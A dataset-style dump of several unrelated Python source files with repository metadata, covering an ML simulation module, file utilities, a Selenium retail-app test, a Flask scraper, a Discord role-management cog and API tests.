train_df['is_val'] = False
train_df.loc[val_idx, 'is_val'] = True
train_df = train_df[train_df['content_type_id'] == 0].reset_index(drop=True)
get_features(train_df)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
7c05eb05c03dd44fb4a79fdfd9f7e41105cb9720 | 61fa932822d22ba480f7aa075573e688897ad844 | /simulation/decai/simulation/contract/classification/decision_tree.py | 0ff59590ed9e023aee0519c23a51d87e43c24768 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | microsoft/0xDeCA10B | a8f118fa1f89f387a0b83f297250fc1846521f41 | 4066eeb2b5298c259a7c19c4d42ca35ef22e0569 | refs/heads/main | 2023-07-26T08:09:34.718104 | 2023-01-25T12:47:17 | 2023-01-25T12:47:17 | 181,561,897 | 538 | 133 | MIT | 2023-07-19T03:10:38 | 2019-04-15T20:37:11 | Python | UTF-8 | Python | false | false | 588 | py | from skmultiflow.trees import HAT, RegressionHAT
from decai.simulation.contract.classification.scikit_classifier import SciKitClassifierModule
class DecisionTreeModule(SciKitClassifierModule):
def __init__(self, regression=False):
if regression:
model_initializer = lambda: RegressionHAT(
# leaf_prediction='mc'
)
else:
model_initializer = lambda: HAT(
# leaf_prediction='mc',
# nominal_attributes=[ 4],
)
super().__init__(_model_initializer=model_initializer)
| [
"[email protected]"
] | |
89082d3e6d1dd0e3be4f75bb4e0565e691c8fce5 | b3e81fa020ea2c02cbcce6f3ed0f623d08a9ce0c | /utils.py | fdcd46b65833241ed662083d03edba7cd08fb417 | [
"MIT"
] | permissive | giuscri/thesis | 646d5b2af6aee030ad415a0c0764e256925a5e38 | d7aa0a8476f53ad304495b437841af1a8d6c87d4 | refs/heads/master | 2022-12-16T16:34:45.978490 | 2018-09-12T09:01:31 | 2018-09-12T09:30:45 | 127,188,321 | 0 | 0 | MIT | 2022-12-08T02:50:27 | 2018-03-28T19:29:09 | Python | UTF-8 | Python | false | false | 613 | py | from binascii import hexlify
import os
import json
import pickle
def dump_pickle_to_file(obj, path):
dirname, basename = os.path.split(path)
os.makedirs(dirname, exist_ok=True)
with open(path, "wb") as f:
pickle.dump(obj, f)
def dump_json_to_file(obj, path):
dirname, basename = os.path.split(path)
os.makedirs(dirname, exist_ok=True)
with open(path, "w") as f:
json.dump(obj, f)
def load_pickle_from_file(path):
with open(path, "rb") as f:
return pickle.load(f)
def load_json_from_file(path):
with open(path, "r") as f:
return json.load(f)
| [
"[email protected]"
] | |
0b1c79bb06a86728c774fc9376b0d475fba7ec11 | 1fcdccf5d651b60bfe906f2ddafd6745f4e29860 | /nufeeb.button/saleretail/lsopenCase.py | 45075fb2e5bd0553ddb5d2b63c49865ac25172d6 | [] | no_license | LimXS/workspace | 6728d6517a764ef2ac8d47fe784c4dba937a1f1d | 9669d653f4a7723947da645de526f4c580ddc88b | refs/heads/master | 2021-01-21T06:39:14.126933 | 2017-04-14T03:24:36 | 2017-04-14T03:24:36 | 83,257,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,875 | py | #*-* coding:UTF-8 *-*
import time
import re
import datetime
import unittest
import xml.dom.minidom
import traceback
import requests
import json
from common import browserClass
from selenium.webdriver.common.keys import Keys #需要引入keys包
browser=browserClass.browser()
class lsopenTest(unittest.TestCase):
u'''批零-零售开单'''
def setUp(self):
self.driver=browser.startBrowser('chrome')
browser.set_up(self.driver)
cookie = [item["name"] + "=" + item["value"] for item in self.driver.get_cookies()]
#print cookie
self.cookiestr = ';'.join(item for item in cookie)
time.sleep(2)
pass
def tearDown(self):
print "test over"
self.driver.close()
pass
def testlsOpen(self):
u'''批零-零售开单-普通商品'''
header={'cookie':self.cookiestr,"Content-Type": "application/json"}
comdom=xml.dom.minidom.parse(r'C:\workspace\nufeeb.button\data\commonlocation')
dom = xml.dom.minidom.parse(r'C:\workspace\nufeeb.button\saleretail\salelocation')
modulename=browser.xmlRead(dom,"module",0)
moduledetail=browser.xmlRead(dom,'moduledetail',7)
browser.openModule2(self.driver,modulename,moduledetail)
cookies=browser.cookieSave(self.driver)
header3={'cookie':cookies,"Content-Type": "application/json"}
header4={'cookie':cookies,"Content-Type": "application/x-www-form-urlencoded"}
#页面id
pageurl=browser.xmlRead(dom,"lsopenurl",0)
pageid=browser.getalertid(pageurl,header)
pageid=pageid[:-1]
#print pageid
#commid,id
commid=browser.getallcommonid(comdom)
#id=browser.getcommonid(dom)
try:
#选择会员
selmenid=pageid+browser.xmlRead(dom,"btnSelectVipMember",0)
browser.delaytime(1)
browser.menbersel(self.driver,selmenid)
browser.delaytime(1)
browser.exjscommin(self.driver,"退出")
#选择套餐
selpackid=pageid+browser.xmlRead(dom,"btnSelectPTypeSuit",0)
browser.delaytime(1)
browser.itempacksel(self.driver,selpackid)
browser.delaytime(1)
browser.exjscommin(self.driver,"退出")
#选择商品
selitid=pageid+browser.xmlRead(dom,"btnSelectPType",0)
browser.delaytime(1)
browser.cateitemsel(self.driver,selitid,1)
#会员卡
menidcard=pageid+browser.xmlRead(dom,"mencard",0)
browser.findId(self.driver,menidcard).click()
browser.exjscommin(self.driver,"取消")
browser.findId(self.driver,menidcard).click()
browser.exjscommin(self.driver,"确定")
browser.exjscommin(self.driver,"关闭")
browser.findId(self.driver,menidcard).click()
js="$(\"input[id$=filter]\").attr(\"value\",\"vip2\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
#挂单
draftid=pageid+browser.xmlRead(dom,"btnSaveDraft",0)
browser.delaytime(1)
browser.findId(self.driver,draftid).click()
#提单
loadid=pageid+browser.xmlRead(dom,"btnLoadBill",0)
browser.delaytime(1)
browser.findId(self.driver,loadid).click()
browser.exjscommin(self.driver,"关闭")
browser.delaytime(2,self.driver)
browser.findId(self.driver,loadid).click()
browser.inputid(self.driver,"edDateScope","最近一周")
browser.exjscommin(self.driver,"查询")
browser.exjscommin(self.driver,"查看")
browser.exjscommin(self.driver,"返回")
browser.exjscommin(self.driver,"快速提单")
#作废单据
clbillid=pageid+browser.xmlRead(dom,"btnClearBill",0)
browser.findId(self.driver,clbillid).click()
browser.accAlert(self.driver,1)
browser.accAlert(self.driver,0)
#钱箱配置
posid=pageid+browser.xmlRead(dom,"btnPosConfig",0)
#小票配置
priconid=pageid+browser.xmlRead(dom,"btnPrintConfig",0)
#零售配置
reid=pageid+browser.xmlRead(dom,"btnRetailConfig",0)
browser.findId(self.driver,reid).click()
browser.exjscommin(self.driver,"关闭")
browser.delaytime(1)
browser.findId(self.driver,reid).click()
browser.delaytime(2,self.driver)
js1="$(\"div[class=TabTopCaptionText]:contains('录帐')\").attr(\"id\",\"reaccid\")"
js2="$(\"div[class=TabTopCaptionText]:contains('抹零')\").attr(\"id\",\"zoreruleid\")"
js3="$(\"div[class=TabTopCaptionText]:contains('默认')\").attr(\"id\",\"slientruleid\")"
browser.delaytime(1)
browser.excutejs(self.driver,js1)
browser.excutejs(self.driver,js2)
browser.excutejs(self.driver,js3)
browser.delaytime(2,self.driver)
browser.findId(self.driver,"reaccid").click()
browser.findId(self.driver,"zoreruleid").click()
browser.findId(self.driver,"slientruleid").click()
jscate="$(\"input[id$=edKType]\").last().attr(\"id\",\"edKType\")"
jspeo="$(\"input[id$=edEType]\").last().attr(\"id\",\"edEType\")"
jscom="$(\"input[id$=edBType]\").last().attr(\"id\",\"edBType\")"
jsdep="$(\"input[id$=edDept]\").last().attr(\"id\",\"edDept\")"
jsstore="$(\"input[id$=edStore]\").last().attr(\"id\",\"edStore\")"
jspos="$(\"input[id$=edPos]\").last().attr(\"id\",\"edPos\")"
browser.delaytime(1)
browser.excutejs(self.driver,jscate)
browser.excutejs(self.driver,jspeo)
browser.excutejs(self.driver,jsdep)
browser.excutejs(self.driver,jsstore)
browser.excutejs(self.driver,jspos)
browser.excutejs(self.driver,jscom)
#-仓库
browser.peoplesel(self.driver,"edKType")
#-经手人
browser.peoplesel(self.driver,"edEType",1)
#-购买单位
browser.buycompanysel(self.driver,"edBType")
#-部门
browser.passpeople(self.driver,"edDept")
#-门店
browser.doubleclick(self.driver,"edStore")
js="$(\"div:contains('mendiantest2')\").last().attr(\"id\",\"selmendian\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"selmendian").click()
#-收银台
browser.doubleclick(self.driver,"edPos")
js="$(\"div:contains('md2cashd2')\").last().attr(\"id\",\"possel\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"possel").click()
browser.exjscommin(self.driver,"保存")
browser.accAlert(self.driver,1)
#快捷键
hotid=pageid+browser.xmlRead(dom,"btnHotkeyConfig",0)
browser.findId(self.driver,hotid).click()
browser.exjscommin(self.driver,"关闭")
#商品名字
browser.findId(self.driver,selitid).click()
browser.exjscommin(self.driver,"选中")
#数量
jsnum="$(\"div[class=GridBodyCellText]:contains('1')\").eq(1).attr(\"id\",\"numid\")"
browser.delaytime(1)
browser.excutejs(self.driver,jsnum)
browser.doubleclick(self.driver,"numid")
browser.exjscommin(self.driver,"取消")
browser.doubleclick(self.driver,"numid")
browser.delaytime(2,self.driver)
js="$(\"input[id$=edDecimal]\").last().val('2')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
#单价
jsprice="$(\"div[class=GridBodyCellText]:contains('29.5')\").first().attr(\"id\",\"pricid\")"
browser.delaytime(1)
browser.excutejs(self.driver,jsprice)
browser.doubleclick(self.driver,"pricid")
browser.exjscommin(self.driver,"取消")
browser.doubleclick(self.driver,"pricid")
js="$(\"input[id$=edDecimal]\").last().val('31.5')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
#折扣
jsdis="$(\"div[class=GridBodyCellText]:contains('1')\").last().attr(\"id\",\"disid\")"
browser.delaytime(1)
browser.excutejs(self.driver,jsdis)
browser.doubleclick(self.driver,"disid")
browser.exjscommin(self.driver,"取消")
browser.doubleclick(self.driver,"disid")
js="$(\"input[id$=edDecimal]\").last().val('0.9')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
#经手人
peoid=pageid+browser.xmlRead(dom,'edEType',0)
browser.peoplesel(self.driver,peoid,1)
#部门
depid=pageid+browser.xmlRead(dom,'edDept',0)
browser.passpeople(self.driver,depid)
#购买单位
companyid=pageid+browser.xmlRead(dom,'edBType',0)
#print companyid
browser.delaytime(1,self.driver)
browser.buycompanysel(self.driver,companyid)
browser.excutejs(self.driver,jsstore)
browser.excutejs(self.driver,jspos)
#门店
browser.doubleclick(self.driver,"edStore")
js="$(\"div:contains('mendiantest2')\").last().attr(\"id\",\"selmendian\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"selmendian").click()
#收银台
browser.doubleclick(self.driver,"edPos")
js="$(\"div:contains('md2cashd2')\").last().attr(\"id\",\"possel\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"possel").click()
#结算
accend=pageid+commid["btnSave"]
browser.findId(self.driver,accend).click()
#-取消
browser.exjscommin(self.driver,"取消")
browser.findId(self.driver,accend).click()
#-多账户选择
browser.exjscommin(self.driver,"多账户选择")
browser.exjscommin(self.driver,"取消")
browser.exjscommin(self.driver,"多账户选择")
browser.exjscommin(self.driver,"确定")
#-资料-现金银行
browser.exjscommin(self.driver,"现金银行")
browser.exjscommin(self.driver,"退出")
browser.findId(self.driver,accend).click()
#-实收金额
js="$(\"input[id$=edReciveMoney]\").val('100')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
#-结算完成
browser.exjscommin(self.driver,"结算完成")
browser.findId(self.driver,selitid).click()
browser.exjscommin(self.driver,"关闭")
except:
print traceback.format_exc()
filename=browser.xmlRead(dom,'filename',0)
#print filename+u"常用-单据草稿.png"
#browser.getpicture(self.driver,filename+u"notedraft.png")
browser.getpicture(self.driver,filename+u"批零-零售开单-普通商品.png")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| [
"[email protected]"
] | |
21ee07fe52e52478946e1a03a80f3566414aa362 | ace048167cf70307096efbc82e75ebe19aadee5a | /testNeuralNetDigits.py | 5fe6914fecc34e02ff12037ce930da31c9a37910 | [] | no_license | devstein/Neural-Net-Practice | 181cd189e6cb9ded6c83c2ad04e0e53b91e6cdf1 | 3f8c87563e47ce5badfc70ad0824703730e600b5 | refs/heads/master | 2020-07-05T17:53:32.835701 | 2016-11-17T18:19:42 | 2016-11-17T18:19:42 | 73,987,428 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py | #test file
import numpy as np
from nn import NeuralNet
from sklearn.linear_model import Ridge
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
from sklearn.metrics import accuracy_score
# load the data
filePathX = "data/digitsX.dat"
file = open(filePathX,'r')
allDataX = np.loadtxt(file, delimiter=',')
X = allDataX
filePathY = "data/digitsY.dat"
file = open(filePathY,'r')
allDataY = np.loadtxt(file)
y = allDataY
# print "X Data Shape:",X.shape
# print "Y Data shape:",y.shape
# X = np.array([[1,2,3,4,5,6,7], [4,4,4,5,5,5,6], [9,8,7,6,5,4,3], [4,1,9,5,8,3,6]])
# X = np.array([[1,2,3,4,5], [4,4,4,5,5], [9,8,7,6,5], [4,8,9,2,3], [7,2,6,3,8]])
# y = np.array([2,5,8,2,7])
layers = np.array([25])
modelNets = NeuralNet(layers, learningRate = 3, numEpochs = 1000, epsilon = 0.5)
modelNets.fit(X, y)
# output predictions on the remaining data
ypred_Nets = modelNets.predict(X)
# compute the training accuracy of the model
accuracyNets = accuracy_score(y, ypred_Nets)
print "Neural Nets Accuracy = "+str(accuracyNets)
filen = "Hidden_Layers.bmp"
modelNets.visualizeHiddenNodes(filen) | [
"[email protected]"
] | |
e31de4e1a953c594960c72cca77dfcc7ee6d890e | afe2e9c6ba965cfdada92d32d5152af360807093 | /pipeline/transformers.py | 78074b0f7c7ab338858d6005bcadeee252b01d76 | [
"MIT"
] | permissive | VanAurum/gcp-dataflow-stream | e0b6244e51f37100842d9ba584d35c683cd6deaf | f0744e2afb2b1cad434cea737e7c33da0f9c6f84 | refs/heads/master | 2022-12-14T17:10:44.814655 | 2019-06-18T17:35:00 | 2019-06-18T17:35:00 | 192,386,670 | 0 | 0 | MIT | 2022-12-08T05:48:37 | 2019-06-17T17:01:13 | Python | UTF-8 | Python | false | false | 355 | py | import datetime
import itertools
import apache_beam as beam
class AddTimestampDoFn(beam.DoFn):
def process(self, element, *args, **kwargs):
trade_date = element.split(',')[0]
unix_timestamp = int(datetime.datetime.strptime(trade_date, '%Y/%m/%d').strftime("%s"))
yield beam.window.TimestampedValue(element, unix_timestamp) | [
"[email protected]"
] | |
7334cf72d2a6bdde3a8ab9efe2cb794cd7675292 | 8e1d7419682a4cb821a7268ed14964e4da9888bd | /TestGroupLib/UnitTestGroup/ArduPlaneTestGroup/CalibrationTestGroup.py | 18aadf26acb15b30eaa7e6a69467f81fca93cdb3 | [] | no_license | sycomix/arsenl-testing | 0f641ead503734e582ae020c4786c86aba49dac2 | 8e3bde0af270179ec1b0d07fc6b811691adeed56 | refs/heads/master | 2020-03-22T02:16:24.570991 | 2014-08-08T20:23:10 | 2014-08-08T20:23:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | import pexpect, os, sys
from pymavlink import mavutil
import util, arduplane
from common import *
class CalibrationTest():
def test_calibrate_barometer(self):
self.mavproxy.send('calpress\n')
assert {0:True, 1:False}[self.mavproxy.expect('barometer calibration complete',timeout=self.TIMEOUT)]
| [
"[email protected]"
] | |
1fbb6a4b9b19c76fe9eef4fe0b2aacea5faa1801 | ca1528083f0c3bf368d68101c28248c1d55a105e | /connect_four_console.py | 9a69049f9a58df7bf68bf985c2af97bcf811b2d3 | [] | no_license | pairut76/connect_four | 15446db4624f735f6bcaf724f94e1479e0e368bc | 2d2b9368f4cb097c4a80de1061e85b931d5626fc | refs/heads/master | 2021-01-12T03:37:51.235473 | 2017-01-06T21:55:53 | 2017-01-06T21:55:53 | 78,241,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,511 | py | import connectfour
def mainsingle():
"""this is the main function frame that operate in the single player status"""
ConnectFourGameState=connectfour.new_game_state()
print('Game start!\n')
printboard(ConnectFourGameState)
print("Enter your move(for example, 'DROP column#' or 'POP column#'\n")
while True:
#check if there is a winner
winnernum=connectfour.winning_player(ConnectFourGameState)
if winnernum== connectfour.NONE:
if not checkboard(ConnectFourGameState):
while True:
if ConnectFourGameState[1]==int(1):
print("Red turn.")
elif ConnectFourGameState[1]==int(2):
print("Yellow turn.")
try:
originalcommand=input("Enter your move: ")
order,colnum=command(originalcommand)
if (order=='POP' or order=='pop') or (order=='DROP' or order=='drop'):
break
else:
print("\nInput format error (must be 'DROP column#' or 'POP column#')\n")
except:
print("\nInput format error (must be 'DROP column#' or 'POP column#')\n")
if order=='DROP' or order=='drop':
try:
ConnectFourGameState=connectfour.drop_piece(ConnectFourGameState, colnum-1)
except connectfour.InvalidMoveError:
print('\nSorry, this column is already full\n')
if order=='POP' or order=='pop':
try:
ConnectFourGameState=connectfour.pop_piece(ConnectFourGameState, colnum-1)
except connectfour.InvalidMoveError:
print('\nSorry, this column is empty\n')
printboard(ConnectFourGameState)
else:
print('\nThe board is already full, no winner.\n')
return
else:
break
printwinner(winnernum)
def command(command: str)->"order, column number":
commandlist=command.split()
order=commandlist[0]
colnum=int(commandlist[1])
return order, int(colnum)
def printboard(ConnectFourGameState):
"""print the board of the current state"""
for colnum in range(connectfour.BOARD_COLUMNS):
print(colnum+1, end=' ')
for rownum in range(connectfour.BOARD_ROWS):
print('')
for colnum in range(connectfour.BOARD_COLUMNS):
if ConnectFourGameState.board[colnum][rownum]==0:
print('. ',end='')
elif ConnectFourGameState.board[colnum][rownum]==1:
print('R ',end='')
else:
print('Y ',end='')
print('')
def printwinner(winnernum):
"""translate the number of player to color it represents"""
if winnernum==1:
print('The game is over! The winner is', ' RED')
else:
print('The game is over! The winner is', ' YELLOW')
def checkboard(ConnectFourGameState):
"""check if the board is all full"""
for onelist in ConnectFourGameState.board:
if 0 in onelist:
return False
else:
pass
return True
mainsingle()
| [
"[email protected]"
] | |
72591a8aef9f9b4b397105543d072e59b973b2c0 | 29620056ef2401e78aa0b45a22035a2e4dcea7e2 | /week4/projects/alonememo/app.py | 09c6ffc65a02719713e6a8abd109f55d0d23cab2 | [] | no_license | 51527/sparta | 52dc3d8886dc330cebc0015618c1074343a173ac | 938cc94d4c06e770a2f0949694d9edd3f660a982 | refs/heads/master | 2022-11-15T06:56:10.827569 | 2020-06-19T21:24:38 | 2020-06-19T21:24:38 | 267,468,287 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | from flask import Flask, render_template, jsonify, request
app = Flask(__name__)
import requests
from bs4 import BeautifulSoup
from pymongo import MongoClient # pymongo를 임포트 하기(패키지 인스톨 먼저 해야겠죠?)
client = MongoClient('localhost', 27017) # mongoDB는 27017 포트로 돌아갑니다.
db = client.dbsparta # 'dbsparta'라는 이름의 db를 만듭니다.
## HTML을 주는 부분
@app.route('/')
def home():
return render_template('index.html')
@app.route('/memo', methods=['GET'])
def listing():
# 1. 모든 document 찾기 & _id 값은 출력에서 제외하기
# 2. articles라는 키 값으로 영화정보 내려주기
all_articles = list(db.articles.find({}, {'_id':0}))
return jsonify({'result':'success', 'articles':all_articles})
## API 역할을 하는 부분
@app.route('/memo', methods=['POST'])
def saving():
# 1. 클라이언트로부터 데이터를 받기
# 2. meta tag를 스크래핑하기
# 3. mongoDB에 데이터 넣기
url_receive = request.form['url_give']
comment_receive = request.form['comment_give']
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get(url_receive,headers=headers)
soup = BeautifulSoup(data.text, 'html.parser')
title = soup.select_one('meta[property="og:title"]')['content']
image = soup.select_one('meta[property="og:image"]')['content']
desc = soup.select_one('meta[property="og:description"]')['content']
doc = {
'title': title,
'image': image,
'url': url_receive,
'comment': comment_receive,
'desc': desc
}
db.articles.insert_one(doc)
return jsonify({'result': 'success', 'msg':'저장!'})
if __name__ == '__main__':
app.run('0.0.0.0',port=5000,debug=True) | [
"[email protected]"
] | |
4f565b06a8882c6c2be3c926f27c1c26aad93c70 | d0e2e0f08c789c3aba44e3f29f2e2b35e231be6d | /cogs/Roles.py | 95438ac70d12438e4f5899d03f6a9ef6835eb392 | [] | no_license | Developing-Studio/ci-Spark-Bot | 04f18f1b475ce1ae9962b7e8133858b831c44180 | 470f25ad6d95a42f4d6089a3073efe00175e82b7 | refs/heads/master | 2022-12-03T21:02:56.986766 | 2020-08-25T00:50:44 | 2020-08-25T00:50:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,666 | py | #•----------Modules----------•#
import discord
from discord.ext.commands import command, Cog, guild_only, has_permissions, bot_has_permissions, BadArgument
import asyncio
from datetime import datetime
import typing
from typing import Union
#•----------Commands----------•#
class Role(Cog, name="Role Management"):
"""😱 `{Commands for Managing Roles}`"""
def __init__(self, bot):
self.bot = bot
@command(
name="roleposition",
brief="{Change the Position of a Role}",
usage="roleposition <#position>") #usage="{Change the position of a Role}")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def position(self, ctx, role: discord.Role, *, position: int):
pass
@command(
name="rolename",
brief="{Change the Name of a Role}",
usage="rolename <role> <new_name>")#description="{Change the name of a Role}")
@guild_only()
@bot_has_permissions(manage_roles=True)
@has_permissions(manage_roles=True)
async def name(self, ctx, role: discord.Role, *, name=None):
#If user doesn't give a new name
if name is None:
await ctx.send("You have to give this role a name")
return
#If they give a name
elif name is not None:
rolename = role.name
#Edit the role
await role.edit(name=name)
e = discord.Embed(
description=f"**Successfully changed {rolename} to {name}**")
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@name.error
async def name_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"<role name"``\n• Valid Syntax: `{ctx.prefix}rolename <new_name> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="rolecolor",
brief="{Change the color of a Role}",
usage="rolecolor <color> <role_name>")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def color(self, ctx, color: discord.Color, *, role: discord.Role):
if not color:
await ctx.send("You gotta give a new color for the role")
return
#If they do give a color
if color:
#Make a few helpful variables
rolecolor = role.color
rolemention = role.mention
#Edit the role
await role.edit(color=color)
#Make and send embed
e = discord.Embed(
description=f"Successfully changed colors for {rolemention}{{`{rolecolor}`}} to {{`{color}`}}")
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@color.error
async def color_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"<role_name>"`\n• Valid Syntax: `{ctx.prefix}role color <color> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="addrole",
brief="{Add a Role to a Member}",
usage="addrole <member> <role>")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def add(self, ctx, member: discord.Member, *, role: discord.Role):
await member.add_roles(role)
await ctx.send(f"Successfully gave {role.mention} to: `{member}`")
@add.error
async def add_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"role_name"`\n• Valid Syntax: `{ctx.prefix}addrole <member> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="removerole",
brief="{Remove a Role from a Member}",
usage="removerole <member> <role_name>",
aliases=['roleremove', 'rremove'])
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def remove(self, ctx, member: discord.Member, *, role: discord.Role):
#Remove role from member
await member.remove_roles(role)
await ctx.send(f"Successfully removed {role.mention} from: `{member}`")
@remove.error
async def remove_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"<role_name>"`\n• Valid Syntax: `{ctx.prefix}role remove <member> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="roleinfo",
brief="{Get Info on a Role}",
usage="roleinfo <role>",
aliases=['ri', 'rinfo'])
@guild_only()
async def info(self, ctx, *, role: discord.Role):
#See when the role was created
role_created = f"{role.created_at.strftime('%a/%b %d/%Y • %I:%M %p')}"
#List number of non-bots
humans = len(list(filter(lambda h: not h.bot, role.members)))
#List number of bots
bots = len(list(filter(lambda b: b.bot, role.members)))
#If there is more than 15 members
if len(role.members) > 25:
length = len(role.members) - 25
human_list = f"{' , '.join(map(str, (member.mention for member in list(reversed(role.members))[:25])))} and **{length}** more"
#If there is less than 25 members
else:
human_list = f"{' , '.join(map(str, (member.mention for member in (list(reversed(role.members[1:]))))))}"
#If there is no members
human_lt = "No Members" if human_list == "" else human_list
#Custom emojis
check = "<:greenmark:738415677827973152>"
x = "<:redmark:738415723172462723>"
#Using emojis from above
#To show any bools
mentionable = check if role.mention else x
hoisted = check if role.hoist else x
e = discord.Embed(
description=f"**General Info for {role.mention} {{Color In Hex > {role.color}}}**")
#Make fields
fields = [("ID", role.id, True),
("Misc",
f"\nMentionable? {mentionable}" +
f"\nDisplays from Others? {hoisted}", True),
("Position", role.position, True),
(f"Members w/{role.name} {{{len(role.members)}}}",
f"\nHumans: {humans}" +
f"\nBots: {bots}", False),
(f"List of Members with this Role", human_lt, False)]
#Show when role was created
e.set_footer(
text=f"Role Created At | {role_created}")
e.set_author(
name=f"Requested by {ctx.author}",
icon_url=ctx.author.avatar_url)
#Add fields
for name, val, inl in fields:
e.add_field(
name=name,
value=val,
inline=inl)
await ctx.send(embed=e)
@info.error
async def info_error(self, ctx, error):
if isinstance(error, BadArgument):
await ctx.send("That isn't a valid role")
@command(
name="rolelist",
brief="{Get a List of All the Roles in the Server}",
usage="rolelist")
@guild_only()
async def _list(self, ctx):
guild = ctx.guild
#Variable for getting roles in guild
rolelist = guild.roles
#Check if there is
#Over 25 roles in the guild
if len(rolelist) > 25:
#Get the length of remaining roles
length = len(rolelist) - 25
role = f"{' • '.join(map(str, (role.mention for role in list(reversed(rolelist))[:20])))} and **{length}** more"
#If there is less than 25 roles
#In the guild
else:
role = f"{' • '.join(map(str, (role.mention for role in list(reversed(rolelist[1:])))))}"
#Check if there is no roles to display
roles = "No Roles" if role == "" else role
#Make and send embed
e = discord.Embed(
title=f"__*Roles in {{{guild.name}}}*__\n**Total {{{len(rolelist)}}}",
description=roles)
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="roleperms",
brief="{Get a List of Perms for a Role}",
usage="roleperms <role>",
aliases=['rolepermission', 'rperms', 'rolepermissions'])
@guild_only()
@bot_has_permissions(use_external_emojis=True)
async def perms(self, ctx, *, role: discord.Role):
#Iterating through list of perms
perms = [f'{perm.title().replace("_", " ")} {("= <:greenmark:738415677827973152>" if value else "= <:redmark:738415723172462723>")}' for perm, value in role.permissions]
#Make and send embed
e = discord.Embed(
color=discord.Color.darker_grey(),
title=f"Permissions for: `{role.name}`",
description="\n\n".join(perms))
e.timestamp = datetime.datetime.utcnow()
await ctx.send(embed=e)
@perms.error
async def perms_error(self, ctx, error):
if isinstance(error, BadArgument):
await ctx.send("That isn't a valid role")
@command(
name="createrole",
brief="{Create a New Role}",
usage="createrole <role_name> (color) (reason_for_creating)")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def create(self, ctx, name=None, color: discord.Color=None, *, reason):
guild = ctx.guild
if reason is None:
await ctx.send("You need to give a reason for creating this role")
return
if name is None:
await ctx.send("You have to give a name for the role")
return
if name is not None:
#Create the new role
msg = await guild.create_role(name=name, color=color, reason=reason)
await ctx.send(f"{msg.mention} was successfully created")
@command(
name="deleterole",
brief="{Delete a Role}",
usage="deleterole <role>",
aliases=['roledelete', 'rdelete', 'roledel'])
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def delete(self, ctx, *, role: discord.Role):
await role.delete()
await ctx.send(f"{role} was successfully deleted")
def setup(bot):
bot.add_cog(Role(bot))
| [
"[email protected]"
] | |
e1417558af05554d61114f6bc326751d76763e79 | 14dd0b79983ca7f6eddcbfb0fb31a3a001cf5b81 | /airflight/tests/views/api/v1/flight/test_flight.py | a4e618308dc3f54e72bf5732f0f172e0ad624800 | [] | no_license | marcelomoraes28/back-end-take-home | 52de4897189584f3ee8ad86e3a80b7eff972e9a2 | 834eba5a3258efeb8690d2881e90ca3838209fb9 | refs/heads/master | 2020-05-22T02:15:05.334327 | 2019-05-15T22:24:40 | 2019-05-15T22:24:40 | 186,195,227 | 0 | 0 | null | 2019-05-12T00:39:02 | 2019-05-12T00:39:02 | null | UTF-8 | Python | false | false | 2,984 | py | import pytest
from pyramid.testing import DummyRequest
from webob.multidict import MultiDict
from airflight.views.api.v1.flight.exceptions import \
OriginIsTheSameAsTheDestination
class TestAPIFlight:
def test_get_route_without_connections(self, app, data):
"""
Get best route without connections when the airline is United Airlines
"""
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'ANK'), ('destination', 'YYZ')])
get_route = FlightAPI(req).get_best_route()
assert len(get_route['data']) == 1
